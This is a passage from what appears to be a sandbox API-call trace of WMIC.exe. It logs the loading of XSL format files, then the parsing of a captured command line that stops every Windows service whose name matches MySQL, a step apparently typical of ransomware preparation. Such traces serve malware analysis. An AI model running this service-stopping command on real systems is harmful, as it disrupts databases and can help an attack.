text=0x4bf9fc*="texttable.xsl") returned 0x0 [0287.811] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.811] malloc (_Size=0xc) returned 0x4198e0 [0287.811] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.812] free (_Block=0x4198e0) [0287.812] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0287.812] malloc (_Size=0xc) returned 0x4198e0 [0287.812] malloc (_Size=0xc) returned 0x41ae28 [0287.812] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.812] SysStringLen (param_1="TABLE") returned 0x5 [0287.812] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.812] SysStringLen (param_1="VALUE") returned 0x5 [0287.812] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.812] SysStringLen (param_1="XML") returned 0x3 [0287.812] SysStringLen (param_1="XML") returned 0x3 [0287.812] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.812] malloc (_Size=0x18) returned 0x412c00 [0287.812] IUnknown:Release (This=0x996b88) returned 0x0 [0287.812] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.812] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.812] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=10, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.813] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="texttable.xsl") returned 0x0 [0287.813] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.813] malloc (_Size=0xc) returned 0x41ae88 [0287.813] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.813] free (_Block=0x41ae88) [0287.813] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0287.813] malloc (_Size=0xc) returned 0x41ae88 [0287.814] malloc (_Size=0xc) returned 0x41ae58 [0287.814] SysStringLen (param_1="texttablewsys") returned 0xd [0287.814] SysStringLen (param_1="TABLE") returned 0x5 [0287.814] SysStringLen (param_1="texttablewsys") returned 0xd [0287.814] SysStringLen (param_1="XML") returned 0x3 [0287.814] SysStringLen (param_1="texttablewsys") returned 0xd [0287.814] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.814] SysStringLen (param_1="XML") returned 0x3 [0287.814] SysStringLen (param_1="texttablewsys") returned 0xd [0287.814] malloc (_Size=0x18) returned 0x412ce0 [0287.814] IUnknown:Release (This=0x996b88) returned 0x0 [0287.814] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.814] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.814] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=11, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.814] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="texttable.xsl") returned 0x0 [0287.814] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.815] malloc (_Size=0xc) returned 0x41aeb8 [0287.815] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.815] free (_Block=0x41aeb8) [0287.815] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0287.815] malloc (_Size=0xc) returned 0x41aea0 [0287.815] malloc (_Size=0xc) returned 0x41aeb8 [0287.815] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0287.815] SysStringLen (param_1="TABLE") returned 0x5 [0287.815] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0287.815] SysStringLen (param_1="XML") returned 0x3 [0287.815] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0287.815] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.815] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.815] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0287.815] malloc (_Size=0x18) returned 0x412aa0 [0287.815] IUnknown:Release (This=0x996b88) returned 0x0 [0287.815] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.816] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.816] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=12, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.816] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="texttable.xsl") returned 0x0 [0287.816] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.816] malloc (_Size=0xc) returned 0x41ae40 [0287.816] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.816] free (_Block=0x41ae40) [0287.816] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0287.816] malloc (_Size=0xc) returned 0x41aed0 [0287.816] malloc (_Size=0xc) returned 0x41ae70 [0287.816] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0287.816] SysStringLen (param_1="TABLE") returned 0x5 [0287.816] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0287.816] SysStringLen (param_1="XML") returned 0x3 [0287.816] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0287.817] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.817] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0287.817] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0287.817] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.817] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0287.817] malloc (_Size=0x18) returned 0x412be0 [0287.817] IUnknown:Release (This=0x996b88) returned 0x0 [0287.817] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.817] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.817] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=13, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.817] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="texttable.xsl") returned 0x0 [0287.817] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.817] malloc (_Size=0xc) returned 0x41ae10 [0287.817] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.817] free (_Block=0x41ae10) [0287.818] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0287.818] malloc (_Size=0xc) returned 0x41ae10 [0287.818] malloc (_Size=0xc) returned 0x41ae40 [0287.818] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0287.818] SysStringLen (param_1="TABLE") returned 0x5 [0287.818] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0287.818] SysStringLen (param_1="XML") returned 0x3 [0287.818] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0287.818] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.818] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0287.818] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0287.818] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0287.818] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0287.818] malloc (_Size=0x18) returned 0x412b80 [0287.818] IUnknown:Release (This=0x996b88) returned 0x0 [0287.818] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.818] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.818] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=14, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.818] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="texttable.xsl") returned 0x0 [0287.819] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.819] malloc (_Size=0xc) returned 0x41ac90 [0287.819] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.819] free (_Block=0x41ac90) [0287.819] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0287.819] malloc (_Size=0xc) returned 0x41ab40 [0287.819] malloc (_Size=0xc) returned 0x41ad80 [0287.819] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0287.819] SysStringLen (param_1="TABLE") returned 0x5 [0287.819] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0287.819] SysStringLen (param_1="XML") returned 0x3 [0287.819] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0287.819] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.819] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0287.819] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0287.819] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0287.819] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0287.819] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0287.820] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0287.820] malloc (_Size=0x18) returned 0x4129e0 [0287.820] IUnknown:Release (This=0x996b88) returned 0x0 [0287.820] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.820] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.820] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=15, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.820] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="htable.xsl") returned 0x0 [0287.820] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.820] malloc (_Size=0xc) returned 0x41abe8 [0287.820] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.820] free (_Block=0x41abe8) [0287.820] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0287.820] malloc (_Size=0xc) returned 0x41ab58 [0287.821] malloc (_Size=0xc) returned 0x41aba0 [0287.821] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0287.821] SysStringLen (param_1="TABLE") returned 0x5 [0287.821] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0287.821] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.821] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0287.821] SysStringLen (param_1="XML") returned 0x3 [0287.821] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0287.821] SysStringLen (param_1="texttablewsys") returned 0xd [0287.821] SysStringLen (param_1="XML") returned 0x3 [0287.821] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0287.821] malloc (_Size=0x18) returned 0x412d00 [0287.821] IUnknown:Release (This=0x996b88) returned 0x0 [0287.821] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.821] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.821] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=16, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.821] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="htable.xsl") returned 0x0 [0287.821] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.822] malloc (_Size=0xc) returned 0x41ac00 [0287.822] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.822] free (_Block=0x41ac00) [0287.822] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0287.822] malloc (_Size=0xc) returned 0x41ad20 [0287.822] malloc (_Size=0xc) returned 0x41abd0 [0287.822] SysStringLen (param_1="htable-sortby") returned 0xd [0287.822] SysStringLen (param_1="TABLE") returned 0x5 [0287.822] SysStringLen (param_1="htable-sortby") returned 0xd [0287.822] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.822] SysStringLen (param_1="htable-sortby") returned 0xd [0287.822] SysStringLen (param_1="XML") returned 0x3 [0287.822] SysStringLen (param_1="htable-sortby") returned 0xd [0287.822] SysStringLen (param_1="texttablewsys") returned 0xd [0287.822] SysStringLen (param_1="htable-sortby") returned 0xd [0287.822] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0287.822] SysStringLen (param_1="XML") returned 0x3 [0287.822] SysStringLen (param_1="htable-sortby") returned 0xd [0287.822] malloc (_Size=0x18) returned 0x412c20 [0287.823] IUnknown:Release (This=0x996b88) returned 0x0 [0287.823] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.823] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.823] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=17, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.823] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="mof.xsl") returned 0x0 [0287.823] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.823] malloc (_Size=0xc) returned 0x41ab70 [0287.823] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.823] free (_Block=0x41ab70) [0287.823] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0287.823] malloc (_Size=0xc) returned 0x41ab70 [0287.823] malloc (_Size=0xc) returned 0x41ad38 [0287.823] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0287.823] SysStringLen (param_1="TABLE") returned 0x5 [0287.823] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0287.824] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.824] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0287.824] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0287.824] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0287.824] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0287.824] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.824] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0287.824] malloc (_Size=0x18) returned 0x412c60 [0287.824] IUnknown:Release (This=0x996b88) returned 0x0 [0287.824] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.824] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.824] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=18, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.824] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="mof.xsl") returned 0x0 [0287.824] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.824] malloc (_Size=0xc) returned 0x41ad98 [0287.824] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.825] free (_Block=0x41ad98) [0287.825] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0287.825] malloc (_Size=0xc) returned 0x41ad98 [0287.825] malloc (_Size=0xc) returned 0x41abe8 [0287.825] SysStringLen (param_1="wmiclimofformat") returned 0xf [0287.825] SysStringLen (param_1="TABLE") returned 0x5 [0287.825] SysStringLen (param_1="wmiclimofformat") returned 0xf [0287.825] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.825] SysStringLen (param_1="wmiclimofformat") returned 0xf [0287.825] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0287.825] SysStringLen (param_1="wmiclimofformat") returned 0xf [0287.825] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0287.825] SysStringLen (param_1="wmiclimofformat") returned 0xf [0287.825] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0287.825] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.825] SysStringLen (param_1="wmiclimofformat") returned 0xf [0287.825] malloc (_Size=0x18) returned 0x412c40 [0287.825] IUnknown:Release (This=0x996b88) returned 0x0 [0287.825] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.825] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.826] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=19, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.826] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="textvaluelist.xsl") returned 0x0 [0287.826] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.826] malloc (_Size=0xc) returned 0x41ac00 [0287.826] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.826] free (_Block=0x41ac00) [0287.826] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0287.826] malloc (_Size=0xc) returned 0x41adb0 [0287.826] malloc (_Size=0xc) returned 0x41ac48 [0287.826] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0287.826] SysStringLen (param_1="TABLE") returned 0x5 [0287.826] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0287.826] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.826] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0287.827] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0287.827] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0287.827] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0287.827] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0287.827] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0287.827] malloc (_Size=0x18) returned 0x412d20 [0287.827] IUnknown:Release (This=0x996b88) returned 0x0 [0287.827] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.827] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.827] IXMLDOMNodeList:get_item (in: This=0x999ca0, index=20, listItem=0x4bf9f8 | out: listItem=0x4bf9f8*=0x996b88) returned 0x0 [0287.827] IXMLDOMNode:get_text (in: This=0x996b88, text=0x4bf9fc | out: text=0x4bf9fc*="textvaluelist.xsl") returned 0x0 [0287.827] IXMLDOMNode:get_attributes (in: This=0x996b88, attributeMap=0x4bf9f4 | out: attributeMap=0x4bf9f4*=0x999fa8) returned 0x0 [0287.827] malloc (_Size=0xc) returned 0x41ac60 [0287.827] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x999fa8, name="KEYWORD", namedItem=0x4bf9f0 | out: namedItem=0x4bf9f0*=0x999ff8) returned 0x0 [0287.827] free (_Block=0x41ac60) [0287.828] IXMLDOMNode:get_nodeValue (in: This=0x999ff8, value=0x4bf9b0 | out: value=0x4bf9b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0287.828] malloc (_Size=0xc) returned 0x41ac00 [0287.828] malloc (_Size=0xc) returned 0x41ac78 [0287.828] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0287.828] SysStringLen (param_1="TABLE") returned 0x5 [0287.828] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0287.828] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0287.828] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0287.828] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0287.828] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0287.828] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0287.828] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0287.828] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0287.828] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0287.828] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0287.828] malloc (_Size=0x18) returned 0x412a20 [0287.828] IUnknown:Release (This=0x996b88) returned 0x0 [0287.829] IUnknown:Release (This=0x999fa8) returned 0x0 [0287.829] IUnknown:Release (This=0x999ff8) returned 0x0 [0287.829] IUnknown:Release (This=0x999ca0) returned 0x0 [0287.829] FreeThreadedDOMDocument:IUnknown:Release (This=0x996b48) returned 0x1 [0287.829] FreeThreadedDOMDocument:IUnknown:Release (This=0x9945a8) returned 0x0 [0287.829] free (_Block=0x419808) [0287.829] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice" [0287.829] malloc (_Size=0xd0) returned 0x41aee8 [0287.829] memcpy_s (in: _Destination=0x41aee8, _DestinationSize=0xce, _Source=0x791b78, _SourceSize=0xca | out: _Destination=0x41aee8) returned 0x0 [0287.829] malloc (_Size=0xc) returned 0x41ac60 [0287.830] malloc (_Size=0xc) returned 0x41ad50 [0287.830] malloc (_Size=0xc) returned 0x41ac18 [0287.830] malloc (_Size=0xc) returned 0x41ac90 [0287.830] malloc (_Size=0x80) returned 0x41afc0 [0287.830] GetLocalTime (in: lpSystemTime=0x4bf994 | out: lpSystemTime=0x4bf994*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1c, wSecond=0x35, wMilliseconds=0x375)) [0287.830] _vsnwprintf (in: _Buffer=0x41afc0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x4bf974 | out: _Buffer="04-02-2020T08:28:53") returned 19 [0287.830] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 66 [0287.830] malloc (_Size=0x86) returned 0x41b048 [0287.830] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 66 [0287.830] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 66 [0287.830] malloc (_Size=0x86) returned 0x41b3d0 [0287.830] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 66 [0287.830] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 66 [0287.830] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 66 [0287.830] malloc (_Size=0xa) returned 0x41adc8 [0287.830] lstrlenW (lpString="path") returned 4 [0287.830] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0287.830] malloc (_Size=0xa) returned 0x41ab88 [0287.830] malloc (_Size=0x4) returned 0x412ee8 [0287.830] free (_Block=0x0) [0287.831] free (_Block=0x41adc8) [0287.831] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 66 [0287.831] malloc (_Size=0x1c) returned 0x419da8 [0287.831] lstrlenW (lpString="Win32_Service") returned 13 [0287.831] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0287.831] malloc (_Size=0x1c) returned 0x410568 [0287.831] malloc (_Size=0x8) returned 0x410590 [0287.831] memmove_s (in: _Destination=0x410590, _DestinationSize=0x4, _Source=0x412ee8, _SourceSize=0x4 | out: _Destination=0x410590) returned 0x0 [0287.831] free (_Block=0x412ee8) [0287.831] free (_Block=0x0) [0287.831] free (_Block=0x419da8) [0287.831] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 66 [0287.831] malloc (_Size=0xc) returned 0x41aca8 [0287.831] lstrlenW (lpString="where") returned 5 [0287.831] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0287.831] malloc (_Size=0xc) returned 0x41abb8 [0287.831] malloc (_Size=0xc) returned 0x41ad68 [0287.831] memmove_s (in: _Destination=0x41ad68, _DestinationSize=0x8, _Source=0x410590, _SourceSize=0x8 | out: _Destination=0x41ad68) returned 0x0 [0287.831] free (_Block=0x410590) [0287.831] free (_Block=0x0) [0287.831] free (_Block=0x41aca8) [0287.831] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 66 [0287.831] malloc (_Size=0x30) returned 0x41c0e0 [0287.831] lstrlenW (lpString="\"name like '%%MySQL%%'\"") returned 23 [0287.831] _wcsicmp (_String1="\"name like '%%MySQL%%'\"", _String2="\"NULL\"") returned -20 [0287.831] lstrlenW (lpString="\"name like '%%MySQL%%'\"") returned 23 [0287.832] lstrlenW (lpString="\"name like '%%MySQL%%'\"") returned 23 [0287.832] malloc (_Size=0x30) returned 0x41c118 [0287.832] malloc (_Size=0x10) returned 0x41ac30 [0287.832] memmove_s (in: _Destination=0x41ac30, _DestinationSize=0xc, _Source=0x41ad68, _SourceSize=0xc | out: _Destination=0x41ac30) returned 0x0 [0287.832] free (_Block=0x41ad68) [0287.832] free (_Block=0x0) [0287.832] free (_Block=0x41c0e0) [0287.832] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 66 [0287.832] malloc (_Size=0xa) returned 0x41aca8 [0287.832] lstrlenW (lpString="call") returned 4 [0287.832] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0287.832] malloc (_Size=0xa) returned 0x41ad68 [0287.832] malloc (_Size=0x18) returned 0x412b20 [0287.832] memmove_s (in: _Destination=0x412b20, _DestinationSize=0x10, _Source=0x41ac30, _SourceSize=0x10 | out: _Destination=0x412b20) returned 0x0 [0287.832] free (_Block=0x41ac30) [0287.832] free (_Block=0x0) [0287.832] free (_Block=0x41aca8) [0287.832] lstrlenW (lpString=" path Win32_Service where \"name like '%%MySQL%%'\" call stopservice") returned 66 [0287.832] malloc (_Size=0x18) returned 0x412d40 [0287.832] lstrlenW (lpString="stopservice") returned 11 [0287.832] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0287.832] malloc 